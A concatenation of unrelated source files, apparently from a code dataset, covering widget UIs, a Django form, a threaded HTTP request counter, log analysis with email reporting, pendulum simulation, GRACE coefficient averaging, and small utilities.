        in_totalarea = widgets.FloatSlider(value=self.totalarea, min=self.lightarea, max=1e3, step=0.1,
            description='totalarea',layout=cell_layout)
        in_beta = widgets.FloatSlider(value=self.beta, min=0., max=50.,step=0.1,
            description='beta',layout=cell_layout,readout_format='.2e')
        in_gamma = widgets.FloatSlider(value=self.gamma, min=0., max=3.0, step=0.1,
            description='gamma',layout=cell_layout,readout_format='.2e')
        in_pn = widgets.IntSlider(value=self.pn, min=-1, max=1, step=1,
            description='pn',layout=cell_layout)
        #linkages: total area can never be smaller than the illuminated area
        arealink = widgets.jslink((in_lightarea,'value'), (in_totalarea,'min')) #also jsdlink works
        attr = ['name']+self.ATTR.copy()
        cntrls = [in_name, in_Eg,in_TC,in_Gsh,in_Rser,in_lightarea,in_totalarea,
            in_Jext,in_JLC,in_beta,in_gamma,in_pn]
        sing_dict = dict(zip(attr,cntrls))
        #singout = widgets.interactive_output(self.set, sing_dict) #all at once
        def on_juncchange(change):
            # function for changing values: forward the control's new value
            # to self.set() keyed by the widget's description
            old = change['old'] #old value
            new = change['new'] #new value
            owner = change['owner'] #control
            value = owner.value
            desc = owner.description
            if new == old:
                with self.debugout: print('Jcontrol: ' + desc + '=', value)
            else:
                with self.debugout: print('Jcontrol: ' + desc + '->', value)
                self.set(**{desc:value})
            #iout.clear_output()
            #with iout: print(self)
        # diode array: one (n, J0ratio) control pair per diode in the model
        in_tit = widgets.Label(value='Junction', description='Junction')
        in_diodelab = widgets.Label(value='diodes:', description='diodes:')
        diode_layout = widgets.Layout(flex_flow='column',align_items='center')
        cntrls.append(in_diodelab)
        in_n = []  # empty list of n controls
        in_ratio = []  # empty list of Jratio controls
        hui = []
        diode_dict = {}
        for i in range(len(self.n)):
            in_n.append(widgets.FloatLogSlider(value=self.n[i], base=10, min=-1, max=1, step=0.001,
                description='n['+str(i)+']',layout=cell_layout))
            in_ratio.append(widgets.FloatLogSlider(value=self.J0ratio[i], base=10, min=-6, max=6, step=0.1,
                description='J0ratio['+str(i)+']',layout=cell_layout))
            cntrls.append(in_n[i])
            cntrls.append(in_ratio[i])
            diode_dict['n['+str(i)+']'] = in_n[i]
            diode_dict['J0ratio['+str(i)+']'] = in_ratio[i]
            #hui.append(widgets.HBox([in_n[i],in_ratio[i]]))
            #cntrls.append(hui[i])
        #diodeout = widgets.interactive_output(self.set, diode_dict) #all at once
        # reverse-bias breakdown controls, only if an RBB model is configured
        if self.RBB_dict:
            RBB_keys = list(self.RBB_dict.keys())
            in_rbblab = widgets.Label(value='RBB:', description='RBB:')
            cntrls.append(in_rbblab)
            in_rbb = []  # empty list of n controls
            for i, key in enumerate(RBB_keys):
                with self.debugout: print('RBB:',i,key)
                if key == 'method':
                    in_rbb.append(widgets.Dropdown(options=['','JFG','bishop'],value=self.RBB_dict[key],
                        description=key, layout=cell_layout, continuous_update=False))
                else:
                    in_rbb.append(widgets.FloatLogSlider(value=self.RBB_dict[key], base = 10, min=-10, max=5, step=0.1,
                        description=key,layout=cell_layout))
                cntrls.append(in_rbb[i])
        # wire every control through the single observer defined above
        for cntrl in cntrls:
            cntrl.observe(on_juncchange,names='value')
        #output
        iout = widgets.Output()
        iout.layout.height = '5px'
        #with iout: print(self)
        cntrls.append(iout)
        # user interface: stack title + all controls vertically
        box_layout = widgets.Layout(display='flex',
                    flex_flow='column',
                    align_items='center',
                    border='1px solid black',
                    width='320px',
                    height = '350px')
        ui = widgets.VBox([in_tit] + cntrls,layout=box_layout)
        self.ui = ui  # make it an attribute
        return ui
|
992,150 | ee18b3aa22cc758872a3e8061e9180be1748fb94 | from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from django import forms
class CreateUserForm(UserCreationForm):
    """Registration form with French placeholder text on every widget.

    The two password fields are redeclared only to attach placeholder
    attributes; validation still comes from UserCreationForm.  The
    remaining widgets are customised through Meta.widgets.
    """
    password1 = forms.CharField(widget=forms.PasswordInput(
        attrs={"name": "password1", 'placeholder': 'Mot de passe'}))
    password2 = forms.CharField(widget=forms.PasswordInput(
        attrs={"name": "password2", 'placeholder': 'Confirmer mot de passe'}))

    class Meta:
        model = User
        fields = ['username', 'first_name', 'last_name', 'email', 'password1', 'password2']
        # Text inputs with French placeholders for the profile fields.
        widgets = {
            'username': forms.TextInput(attrs={"name": "username", "placeholder": "Nom d'utilisateur"}),
            'first_name': forms.TextInput(attrs={"name": "first_name", "placeholder": "Prénom"}),
            'last_name': forms.TextInput(attrs={"name": "last_name", "placeholder": "Nom"}),
            'email': forms.TextInput(attrs={"name": "email", "placeholder": "Email"}),
        }
|
992,151 | 35275ec2302cb0adab48400b25a5d32de5a6d132 | import threading
from time import sleep, time
from curl import request
successfull_requests_count = 0
un_successfull_requests_count = 0
class Requester(threading.Thread):
    """Worker thread that fires `requests_count` HTTP requests at `uri`.

    Outcomes are tallied in the module-level counters
    `successfull_requests_count` / `un_successfull_requests_count`.
    """

    def __init__(self, uri, name, requests_count, headers=None, user_agent="PostmanRuntime/7.15.2", verbose=False):
        super().__init__()
        self.name = name
        self.uri = uri
        self.user_agent = user_agent
        # BUG FIX: the original used a mutable default (`headers={}`), which is
        # shared across every instance created without an explicit dict.
        self.headers = {} if headers is None else headers
        self.requests_count = requests_count
        self.verbose = verbose

    def run(self):
        """Issue the requests sequentially, one per second, updating the global tallies."""
        global successfull_requests_count
        global un_successfull_requests_count
        for _ in range(0, self.requests_count):
            sleep(1)  # pace requests one second apart
            resp = request(
                uri=self.uri,
                ssl_verify=False,
                verbose=self.verbose,
                headers=self.headers,
                user_agent=self.user_agent
            )
            if resp['res_code'] == 200:
                successfull_requests_count += 1
            else:
                un_successfull_requests_count += 1
        # print(self.name, 'request number ' + str(i), resp['res_code'])
class ThreadsLifeChecker(threading.Thread):
    """Watchdog thread: polls the workers and prints a summary once all die.

    Reads the module-level globals (threads_count, thread_requests_count,
    start, and the success/failure counters) to build the report.
    """

    def __init__(self, thread_objects):
        super().__init__()
        self.thread_objects = thread_objects

    def run(self):
        while True:
            # Count workers that are still running.
            still_running = sum(1 for worker in self.thread_objects if worker.is_alive())
            if still_running == 0:
                end = time()
                print("sended requests count is: ", (threads_count * thread_requests_count))
                print("success requests count is: ", successfull_requests_count)
                print("unsuccess requests count is: ", un_successfull_requests_count)
                print("execution time is: ", (end - start))
                break
            sleep(0.2)  # poll five times a second
if __name__ == '__main__':
    # Spawn `threads_count` workers, each issuing `thread_requests_count`
    # requests, staggered 0.1 s apart, then start the watchdog that reports
    # the totals once every worker has finished.
    threads_count = 100
    thread_requests_count = 4
    thread_objects_array = []
    start = time()
    for i in range(0, threads_count):
        th_object = Requester(uri="http://google.com", name="Thread " + str(i), requests_count=thread_requests_count)
        thread_objects_array.append(th_object)
        th_object.start()
        sleep(0.1)  # stagger thread start-up
    ThreadsLifeChecker(thread_objects=thread_objects_array).start()
|
992,152 | f78ec134eb5298bd4813f7b2486989d458ccd51d | #!/usr/local/python2711/bin/python
# *-* coding:utf-8 *-*
import re
import os
import sys
import time
import datetime
import subprocess
from time import clock as now
import smtplib
from email.mime.text import MIMEText
from email.mime.image import MIMEImage
from email.mime.multipart import MIMEMultipart
import socket
import fcntl
import struct
#time1 = now()
before = datetime.datetime.now() - datetime.timedelta(days=1)
beforedate = before.strftime("%Y-%m-%d")
#LOG_DIR = '/data/' + CP + '/' + ROLE + '/access_log'
backupdir = '/opt/domaincount/' + beforedate
## global var
lfile = backupdir + '/' + 'nimei2.txt'
def getfile():
    """Concatenate yesterday's access logs for the current CP into `lfile`.

    Uses the module globals LOG_DIR / backupdir / beforedate / lfile.
    Returns 0 when no matching log file exists; otherwise returns None
    (implicitly) after the shell `cat` finishes.
    """
    subprocess.Popen("mkdir -p " + backupdir, shell=True)
    #print "cd " + LOG_DIR + ' && ' + 'ls -lthr --time-style=long-iso | awk ' + "'" + '/' + beforedate + '/' + "'" + " | awk '{print $NF}'"
    # Shell pipeline: list files whose long-iso mtime matches yesterday's date.
    flist = "cd " + LOG_DIR + ' && ' + 'ls -lthr --time-style=long-iso | awk ' + "'" + '/' + beforedate + '/' + "'" + " | awk '{print $NF}'"
    f2 = subprocess.Popen(flist, stdout=subprocess.PIPE, shell=True)
    f2.wait()
    file1 = f2.stdout.read().replace('\n', ' ')
    if len(file1):
        #if os.path.exists(LOG_DIR + '/' + file1):
        #print "cd " + LOG_DIR + ' && ' + "cat " + file1 + '> ' + lfile
        # Concatenate all of yesterday's logs into the working file.
        file2 = "cd " + LOG_DIR + ' && ' + "cat " + file1 + '> ' + lfile
        f1 = subprocess.Popen(file2, shell=True)
        f1.wait()
    else:
        #print LOG_DIR + ' file is not exists'
        return 0
def getip(ifname):
    """Return the IPv4 address bound to interface `ifname` (Linux only).

    Performs the SIOCGIFADDR ioctl on a throwaway UDP socket; bytes 20-24
    of the returned ifreq struct hold the packed address.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    return socket.inet_ntoa(fcntl.ioctl(
        s.fileno(),
        0x8915,  # SIOCGIFADDR
        struct.pack('256s', ifname[:15])
    )[20:24])
def treatfile(log_path = lfile):
    """Count per-domain hits in `log_path` and append the top entries to the
    CSV at the global `result3` (row format: CP,count,domain).

    Log fields are separated by the multi-byte delimiter 'の'; bare IPs and
    IP:PORT entries are filtered out of the top-23 ranking before writing.
    """
    ip_info = {}
    new_ip_info = {}
    with open(log_path,'r') as f:
        for line in f.readlines():
            line = line.strip()
            if not len(line):
                continue
            ## get the client ip
            #ip = line.split('の')[2]
            #print ip
            ## get the domain the client accessed (field 4)
            try:
                domain = line.split('の')[4]
            except IndexError,e:
                #print "error: domain %s" % e
                continue
            ## get the url the client accessed
            #url = line.split('の')[5]
            #print url
            #if ip not in ip_info:
            #    ip_info[ip] = {url:1}
            #else:
            #    if url not in ip_info[ip]:
            #        ip_info[ip][url] = 1
            #    else:
            #        ip_info[ip][url] += 1
            if domain not in ip_info:
                ip_info[domain] = 1
            else:
                ip_info[domain] += 1
    ## drop the placeholder entry whose key is '-'
    if '-' in ip_info.keys():
        del ip_info['-']
    # Top 23 domains by hit count (Python 2 cmp-style sort).
    old_result = sorted(ip_info.items(), lambda x, y: cmp(x[1], y[1]), reverse=True)[0:23]
    ## re.search(): skip keys that are bare IPs or IP:PORT
    for k,v in old_result:
        if re.search(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', k) != None:
            continue
        elif re.search(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:(\d+)$', k) != None:
            continue
        new_ip_info[k] = v
    ## re.match() alternative (kept for reference)
    #for k,v in old_result:
    #    if re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$', k) != None:
    #        continue
    #    elif re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:(\d+)$', k) != None:
    #        continue
    #    new_ip_info[k] = v
    ## fuzzy variant matching both IP and IP:PORT at once (kept for reference)
    #for k,v in old_result:
    #    if re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', k) != None:
    #        continue
    #    new_ip_info[k] = v
    new_result = sorted(new_ip_info.items(), lambda x, y: cmp(x[1], y[1]), reverse=True)
    for k,v in new_result:
        # python 2.6.6
        #print CP + ' ' + '{0} {1}'.format(str(v),k)
        #print ("%-5s" % CP) + ("%-10d" % v) + ("%-10s" % k)
        result2 = ("%-5s" % CP) + ',' + ("%-10d" % v) + ',' + ("%-10s" % k) + '\n'
        #result2 = CP + ',' + '{1},{0}'.format(str(v),k) + '\n'
        # python 2.7.11
        #print '{:10s} {:<10s}'.format(str(v),k)
        #result2 = '{:10s} {:<10s}'.format(str(v),k) + '\n'
        with open(result3, 'a+') as f2:
            f2.write(result2)
        f2.close()
    f.close()
## sendmail
def SendMail():
    """E-mail the domain-ranking CSV (global `result3`) via plain SMTP.

    The message carries the CSV both inline (commas shown as spaces) and as
    a base64 attachment.  No auth/TLS is used; errors are printed only.
    """
    HOST = "1.1.1.1"
    PORT = "25"
    SUBJECT = u"产品域名统计 from %s" % getip('eth0')
    TO = ["to_mail1","to_mail2"]
    FROM = "from_mail"
    CC = ["cc_mail"]
    tolist = ','.join(TO)
    cclist = ','.join(CC)
    # Inline body: yesterday's date plus the CSV contents.
    msgtext2 = MIMEText(beforedate + '' + '排名前20的域名:' + '\n' + open(result3,"rb").read().replace(',',' '))
    msgtext1 = MIMEText("""
    <table width="800" border="0" cellspacing="0" cellpadding="4">
    <tr>
    <td bgcolor="#CECFAD" height="20" style="font-size:14px">排名前20的域名: <a href="www.w66.com">点我点我</a></td>
    </tr>
    </table>""","html","utf-8")
    msg = MIMEMultipart()
    #msg.attach(msgtext1)
    msg.attach(msgtext2)
    #print result3
    # CSV attachment, base64-encoded as a generic octet stream.
    attach = MIMEText(open(result3,"rb").read(), "base64", "utf-8")
    attach["Content-Type"] = "application/octet-stream"
    attach["Content-Disposition"] = "attachment; filename=\"web_domain_count.csv\"".decode("utf-8").encode("utf-8")
    msg.attach(attach)
    msg['Subject'] = SUBJECT
    msg['From'] = FROM
    msg['To'] = tolist
    msg['Cc'] = cclist
    try:
        server = smtplib.SMTP()
        server.connect(HOST, PORT)
        #server.starttls()
        #server.login("test@gmail.com","123456")
        server.sendmail(FROM, TO + CC, msg.as_string())
        server.quit()
        #print "send mail success!"
    except Exception, e:
        print "Error: " + str(e)
if __name__ == "__main__":
CPS = ['A01', 'A03', 'A04', 'A05', 'A07', 'B01', 'C02', 'E02', 'E03', 'E04']
ROLE = 'web'
result3 = backupdir + '/' + 'web_domain_count.csv'
os.system('rm -f ' + result3)
for CP in CPS:
#print '-------------%s-----------' % CP
LOG_DIR = '/data/' + CP + '/' + ROLE + '/access_log'
if getfile() is 0:
print
continue
treatfile()
#print
SendMail()
time2 = now()
#print
#print 'run time is ' + str(time2 - time1) + 's'
|
992,153 | 788e87d5962b75d7ed7190d7e5c66940b7657ec0 | import numpy as np
from scipy.integrate import odeint
def get_pendulum_data(n_training_ics, n_validation_ics, n_test_ics):
    """Simulate the pendulum and package training/validation/test splits.

    Each split is a dict with keys:
      't'            -- shared time vector,
      'x','dx','ddx' -- flattened image sequence and its first/second time
                        derivatives, shape (n_ics * t.size, n_pixels),
      'z','dz'       -- true angle and angular velocity, (n_ics * t.size, 1).

    Refactor: the original duplicated the same packaging code three times;
    it is now factored into _make_pendulum_split.
    """
    training_data = _make_pendulum_split(n_training_ics)
    val_data = _make_pendulum_split(n_validation_ics)
    test_data = _make_pendulum_split(n_test_ics)
    return training_data, val_data, test_data


def _make_pendulum_split(n_ics):
    """Run generate_pendulum_data for n_ics initial conditions and flatten
    the results into the dict layout described in get_pendulum_data."""
    t, u, du, ddu, v = generate_pendulum_data(n_ics)
    data = {}
    data['t'] = t
    data['x'] = u.reshape((n_ics*t.size, -1))
    data['dx'] = du.reshape((n_ics*t.size, -1))
    data['ddx'] = ddu.reshape((n_ics*t.size, -1))
    data['z'] = v.reshape((n_ics*t.size, -1))[:, 0:1]
    data['dz'] = v.reshape((n_ics*t.size, -1))[:, 1:2]
    return data
def generate_pendulum_data(n_ics):
    """Simulate n_ics pendulum trajectories and render them as images.

    Returns (t, u, du, ddu, x): time vector, 51x51 image sequence, its
    first and second time derivatives (chain rule on the Gaussian blob),
    and the state trajectories x = (theta, dtheta).
    """
    # Simple pendulum: theta'' = -sin(theta).
    f = lambda x, t : [x[1], -np.sin(x[0])]
    t = np.arange(0, 10, .02)
    x = np.zeros((n_ics,t.size,2))
    dx = np.zeros(x.shape)
    x1range = np.array([-np.pi,np.pi])
    x2range = np.array([-2.1,2.1])
    i = 0
    while (i < n_ics):
        # Rejection-sample initial conditions: keep only energies clearly
        # below the separatrix (|E| <= .99) so trajectories oscillate.
        x0 = np.array([(x1range[1]-x1range[0])*np.random.rand()+x1range[0],
            (x2range[1]-x2range[0])*np.random.rand()+x2range[0]])
        if np.abs(x0[1]**2/2. - np.cos(x0[0])) > .99:
            continue
        x[i] = odeint(f, x0, t)
        dx[i] = np.array([f(x[i,j], t[j]) for j in range(len(t))])
        i += 1
    n = 51
    xx,yy = np.meshgrid(np.linspace(-1.5,1.5,n),np.linspace(1.5,-1.5,n))
    # Image: Gaussian blob centred at the pendulum bob position.
    create_image = lambda theta : np.exp(-((xx-np.cos(theta-np.pi/2))**2 + (yy-np.sin(theta-np.pi/2))**2)/.05)
    # d/dt and d2/dt2 of the Gaussian exponent (chain rule terms).
    argument_derivative = lambda theta,dtheta : -1/.05*(2*(xx - np.cos(theta-np.pi/2))*np.sin(theta-np.pi/2)*dtheta \
                                                        + 2*(yy - np.sin(theta-np.pi/2))*(-np.cos(theta-np.pi/2))*dtheta)
    argument_derivative2 = lambda theta,dtheta,ddtheta : -2/.05*((np.sin(theta-np.pi/2))*np.sin(theta-np.pi/2)*dtheta**2 \
                                                                 + (xx - np.cos(theta-np.pi/2))*np.cos(theta-np.pi/2)*dtheta**2 \
                                                                 + (xx - np.cos(theta-np.pi/2))*np.sin(theta-np.pi/2)*ddtheta \
                                                                 + (-np.cos(theta-np.pi/2))*(-np.cos(theta-np.pi/2))*dtheta**2 \
                                                                 + (yy - np.sin(theta-np.pi/2))*(np.sin(theta-np.pi/2))*dtheta**2 \
                                                                 + (yy - np.sin(theta-np.pi/2))*(-np.cos(theta-np.pi/2))*ddtheta)
    u = np.zeros((n_ics, t.size, n, n))
    du = np.zeros((n_ics, t.size, n, n))
    ddu = np.zeros((n_ics, t.size, n, n))
    for i in range(n_ics):
        for j in range(t.size):
            # Wrap the angle so the rendered position stays in (-pi, pi].
            x[i,j,0] = wrap_to_pi(x[i,j,0])
            u[i,j] = create_image(x[i,j,0])
            du[i,j] = (create_image(x[i,j,0])*argument_derivative(x[i,j,0], dx[i,j,0]))
            ddu[i,j] = create_image(x[i,j,0])*((argument_derivative(x[i,j,0], dx[i,j,0]))**2 \
                                               + argument_derivative2(x[i,j,0], dx[i,j,0], dx[i,j,1]))
    return t,u,du,ddu,x
def wrap_to_pi(x):
    """Wrap angle(s) x into the interval (-pi, pi]; works elementwise on arrays."""
    wrapped = x % (2 * np.pi)
    # Shift anything past pi down by a full turn.
    return wrapped - (wrapped > np.pi) * (2 * np.pi)
|
992,154 | 3371afa1f2a520d8b37268acb13f554e91108a25 | import gzip
import os
import tkFileDialog
import xlsxwriter
import Tkinter as tk
import numpy as np
class TemporalMeanFrame(tk.Frame):
    """Tkinter GUI (Python 2) for computing the temporal mean of GRACE
    spherical-harmonic coefficient files.

    Workflow: pick a directory of gzipped monthly files, average the Clm/Slm
    coefficients over all months, write the means to an Excel workbook and
    the mean-subtracted monthly coefficients to text files.
    """
    def __init__(self, master=None):
        tk.Frame.__init__(self, master)
        self.master = master
        self.init_window()
    def init_window(self):
        """Lay out the labels, text field and buttons at fixed positions."""
        self.master.title("Temporal Mean Calculation")
        self.pack(fill=tk.BOTH, expand=1)
        inputgracedirlbl = tk.Label(self.master, text="Raw Data Directory")
        inputgracedirlbl.place(x=20, y=50)
        self.inputgracedirtxtfield = tk.Text(self.master, height=1, width=50)
        self.inputgracedirtxtfield.place(x=130, y=50)
        inputgracedirbtn = tk.Button(self.master, text="Browse", command=self.selectgracerawdatadir)
        inputgracedirbtn.place(x=540, y=47)
        self.startcalculatingtemporalmeanbtn = tk.Button(self.master, text="Calculate Temporal Mean",
                                                         command=self.calculatetemporalmean)
        self.startcalculatingtemporalmeanbtn.place(x=450, y=200)
        self.cancelbtn = tk.Button(self.master, text="Cancel", command=self.exit)
        self.cancelbtn.place(x=400, y=200)
        self.opentemporalmeanbtn = tk.Button(self.master, text="Open Temporal Mean", command=self.opentemporalmean)
        self.opentemporalmeanbtn.place(x=50, y=200)
        # Enabled only after a successful calculation run.
        self.opentemporalmeanbtn.config(state="disabled")
    def exit(self):
        """Close the application window."""
        self.master.destroy()
    def selectgracerawdatadir(self):
        """Ask for the raw-data directory and display the file count."""
        self.inputfilespath = tkFileDialog.askdirectory(initialdir="/", title="Select GRACE Raw Data Directory")
        self.files = os.listdir(self.inputfilespath)
        nooffiles = "No of Files= " + str(len(self.files))
        self.nooffileslbl = tk.Label(self.master, text=nooffiles)
        self.nooffileslbl.place(x=20, y=100)
    def calculatetemporalmean(self):
        """Average Clm/Slm over all .gz files; write the mean to Excel and
        the mean-subtracted monthly coefficients to 'processed/'.

        NOTE(review): assumes each data line is
        'tag degree order Clm Slm ...' after a 7-line header -- confirm
        against the GRACE file format actually used.
        """
        self.cancelbtn.config(state="disabled")
        self.startcalculatingtemporalmeanbtn.config(state="disabled")
        # Creating clm_all & slm_all container (degree x order x num_of_files)
        grace_base = 60  # grace base either 60 or 96
        max_files = 200  # maximum number of files used expected
        clm_all = np.zeros(dtype='f', shape=[grace_base + 1, grace_base + 1, max_files])
        slm_all = np.zeros(dtype='f', shape=[grace_base + 1, grace_base + 1, max_files])
        index = -1
        filenames = []
        if not os.path.exists(self.inputfilespath + '/raw/'):
            os.makedirs(self.inputfilespath + '/raw/')
        if not os.path.exists(self.inputfilespath + '/processed/'):
            os.makedirs(self.inputfilespath + '/processed/')
        workbook = xlsxwriter.Workbook(self.inputfilespath + '/raw/' + 'GRACE Raw Data.xlsx')
        worksheet = workbook.add_worksheet()
        # Header
        # worksheet.write(0, 0, 'Coefficient')
        # worksheet.write(0, 1, 'Degree')
        worksheet.write(0, 0, 'Order')
        worksheet.write(0, 1, 'Degree')
        worksheet.write(0, 2, 'Clm Mean')
        worksheet.write(0, 3, 'Slm Mean')
        # First pass: decompress every .gz into raw/<name>.txt for inspection.
        for x in self.files:
            if ".gz" in x:
                try:
                    filename = x.split('.')[0]  # File Name without extension
                    filenames.append(filename)
                    with gzip.open(self.inputfilespath + '/' + x, 'rb') as f:
                        file_content = f.read()
                    o = open(self.inputfilespath + '/raw/' + filename + '.txt', 'w')
                    o.write(file_content)
                    o.close()
                except Exception as e:
                    print(e)
                    print "Could not read " + x
                    continue
            else:
                print("File " + x + " is not a .gz file")
                continue
        # Second pass: parse coefficients into the 3-D containers.
        for x in self.files:
            # print x[6:26]
            if ".gz" in x:
                index += 1
                print "Starting in file:" + x[6:26]
                try:
                    f = gzip.GzipFile(self.inputfilespath + '/' + x, "r")
                    data = f.readlines()[7:]  # read from the line no 7.. you should later add the coeff. (0,0) values
                    for entry in data:
                        tmp = entry.split(' ')
                        m = []
                        for n in tmp:
                            if n != '':
                                m.append(n)
                        clm_all[int(m[1]), int(m[2]), index] = float(m[3])
                        slm_all[int(m[1]), int(m[2]), index] = float(m[4])
                    f.close()
                except:
                    print "Could not open " + x
                    continue
        print index  # counter for num of files processed
        print clm_all.shape
        print slm_all.shape
        # delete all empty layers (more than 163 will be deleted)
        # clm & slm are filled, num of layers = index
        clm_all = clm_all[:, :, 0:index + 1]
        slm_all = slm_all[:, :, 0:index + 1]
        # calculate mean for clm and slm
        clm_mean = np.mean(clm_all, axis=2)
        slm_mean = np.mean(slm_all, axis=2)
        # subtract mean from each layer in clm and slm
        clm_cleaned = np.zeros(dtype='f', shape=[grace_base + 1, grace_base + 1, index + 1])
        slm_cleaned = np.zeros(dtype='f', shape=[grace_base + 1, grace_base + 1, index + 1])
        for layer in range(index + 1):
            clm_cleaned[:, :, layer] = clm_all[:, :, layer] - clm_mean
            slm_cleaned[:, :, layer] = slm_all[:, :, layer] - slm_mean
        # Write the triangular (order <= degree) mean table to Excel.
        count = 1
        for xx in range(0, grace_base + 1):
            for yy in range(0, xx + 1):
                # print "[" + str(xx) + ", " + str(yy) + "]"
                worksheet.write(count, 0, xx)
                worksheet.write(count, 1, yy)
                worksheet.write(count, 2, clm_mean[xx, yy])
                worksheet.write(count, 3, slm_mean[xx, yy])
                count += 1
        workbook.close()
        # One mean-subtracted text file per month.
        for i in range(index + 1):
            try:
                o = open(self.inputfilespath + '/processed/' + "filtered.month." + str(i).zfill(3) + '.txt', 'w')
                # o = open(self.inputfilespath + '/processed/' + filenames[i] + '.txt', 'w')
                for xx in range(0, grace_base + 1):
                    for yy in range(0, xx + 1):
                        o.write('{0:6d}'.format(xx) + " " + '{0:6d}'.format(yy) + " " + (
                            '%.8E' % clm_cleaned[xx, yy, i]) + " " + ('%.8E' % slm_cleaned[xx, yy, i]) + "\n")
                o.close()
            except Exception as e:
                print(e)
                print "Could not read " + x
                continue
        #########################################
        #########################################
        self.opentemporalmeanbtn.config(state="active")
        self.cancelbtn.config(state="active")
    def opentemporalmean(self):
        """Open the generated workbook in Excel (Windows only)."""
        os.chdir(self.inputfilespath)
        os.system('start excel.exe "%s/raw/GRACE Raw Data.xlsx"' % (self.inputfilespath,))
        # os.system('start excel.exe "%s\\MonthIndex.xlsx"' % (self.inputfilespath,))
|
992,155 | 80ce028646bd5c22e3dd790c18490923f352f629 | import sh
def main(fname_pair_list):
    """Materialise each (source, target) pair: decompress .zst sources with
    zstd, copy everything else verbatim."""
    for source_url, target_url in fname_pair_list:
        if not source_url.endswith('.zst'):
            sh.cp('-v', source_url, target_url)
            continue
        # Zstandard archive: decompress into the target path.
        sh.zstd('-d', source_url, '-o', target_url)
if __name__ == '__main__':
    # Snakemake injects a `snakemake` object into this script's namespace;
    # inputs and outputs are paired one-to-one.
    assert len(snakemake.input) == len(snakemake.output)
    main(zip(snakemake.input, snakemake.output))
|
992,156 | 9bf4bffdacbfb4d88c8073ad4b5ea96fed06d23d | class Solution:
def longestCommonPrefix(self, strs: List[str]) -> str:
return self.common_prefix(strs)
def common_prefix(self, strs: List[str]) -> str:
min_str = len(min(strs, key=len))
N = len(strs)
lo = 0
hi = min_str - 1
prefix = ''
while (lo<=hi):
mid = lo + (hi-lo) // 2
if self.is_common_prefix(strs, N, lo, mid):
prefix = strs[0][0:mid+1]
lo = mid + 1
else:
hi = mid - 1
return prefix
def is_common_prefix(self, strs, n, begin, end):
t = strs[0]
for i in range(n):
s = strs[i]
for j in range(begin, end+1):
if s[j] != t[j]:
return False
return True
def solve(self, strs: List[str]) -> str:
if len(strs) == 0:
return ""
common_prefix = []
trial = min([len(el) for el in strs])
for i in range(trial):
if i+1 > trial:
break
prefix = [s[:i+1] for s in strs]
if len(set(prefix)) != 1:
break
common_prefix = prefix.copy()
if len(common_prefix) == 0: return ""
return common_prefix[0]
|
992,157 | c1a3801ea5c05ae65f796a061c36fb675ee9027b | import numpy as np
import os
import random
import torch
from torch.utils.tensorboard import SummaryWriter
from model import RNNActorCriticNetwork
from env import create_train_env
from config import get_args
def main():
    """Build the env and actor-critic model, then write the model graph to
    TensorBoard by tracing it with a dummy observation."""
    args = get_args()
    device = torch.device('cuda' if args.cuda else 'cpu')
    env = create_train_env(1, args.difficulty, args.macro, 'env1.mp4')
    input_size = env.observation_space.shape[0]
    output_size = env.action_space.n
    model = RNNActorCriticNetwork(input_size, output_size,
                                  args.noise_linear).to(device)
    model.eval()
    # Leading (1, 1, ...) dims: batch and sequence of length one.
    dummy_input = torch.rand(1, 1, *env.observation_space.shape).to(device=device)
    writer = SummaryWriter(log_dir=args.log_dir)
    writer.add_graph(model, (dummy_input, ))
# Run only when executed as a script (not on import).
if __name__ == '__main__':
    main()
992,158 | 7d3edac42df95953ac4c578c4e9a3dff09a7cb0e | from typing import Any
# Type-stub style declarations (bodies intentionally `...`); signatures
# mirror ldap3-style LDAP add-operation helpers.
def add_operation(
    dn, attributes, auto_encode, schema: Any | None = ..., validator: Any | None = ..., check_names: bool = ...
): ...
def add_request_to_dict(request): ...
def add_response_to_dict(response): ...
|
992,159 | bd68a43353a539b997c53162ae785ca4efb5a247 | #!/usr/bin/env python
#-*- coding: utf-8 -*-
URL_QUERY = 'http://60.190.19.138:7080/stu/sel_result.jsp'
REGEX_TR = r'<tr>[\s\S]*?<\/tr>'
REGEX_TH = r'<th[\s\S]*?>[\s\S]*?<\/th>'
REGEX_TD = r'<td[\s\S]*?>([\s\S]*?)<\/td>'
REGEX_NUM = r'[\d\.]+'
REGEX_TIME = r'The above information up to ([\s\S]*?)<\/'
REGEX_BACK = r'history\.back\(\);'
import codecs
import os
import re
import datetime, time
import urlparse
import urllib3
import sqlite3
import leveldb
import json
import os
count = 0
def str2fen(s):
    """Convert a decimal amount string (yuan) to an integer number of fen."""
    amount = float(s)
    return int(amount * 100)
def loadConfig():
    """Load ../../config.json (relative to this file) into the global `config`."""
    global config
    with open(os.path.join(os.path.dirname(__file__), '../../config.json')) as f:
        config = json.load(f);
def initDatabase():
    """Open the SQLite and LevelDB stores and create tables if missing.

    Populates the globals conn/cursor/saveCursor/roomCursor and userbind.
    """
    global conn, cursor, saveCursor, roomCursor
    conn = sqlite3.connect(os.path.join(os.path.dirname(__file__), '../..', config['db']['path'], config['db']['sqlite']['coal']))
    cursor = conn.cursor()
    saveCursor = conn.cursor()
    roomCursor = conn.cursor()
    cursor.execute('CREATE TABLE IF NOT EXISTS roomlist (id INTEGER PRIMARY KEY, build INTEGER, room INTEGER)')
    cursor.execute('CREATE TABLE IF NOT EXISTS data (rid, water_value, water_money, hotwater_value, hotwater_money, electricity_value, electricity_money, time)')
    cursor.execute('CREATE TABLE IF NOT EXISTS usage (rid, water_value, water_money, hotwater_value, hotwater_money, electricity_value, electricity_money, time)')
    global userbind
    userbindPath = os.path.join(os.path.dirname(__file__), '../..', config['db']['path'], config['db']['level']['userbind'])
    # NOTE(review): force-removes the LevelDB LOCK file to clear a stale
    # lock; this raises OSError when the file is absent -- confirm intent.
    os.remove(os.path.join(userbindPath, 'LOCK'))
    userbind = leveldb.LevelDB(userbindPath)
def rowInserted():
    """Bump the global insert counter and commit every 100 rows."""
    global count
    count += 1
    if count % 100 == 0:
        conn.commit()
def updateRoomList():
    """Scan the user-binding LevelDB and register any new rooms.

    A room not yet in `roomlist` is queried once; on success it is inserted
    and today's reading is saved immediately.
    """
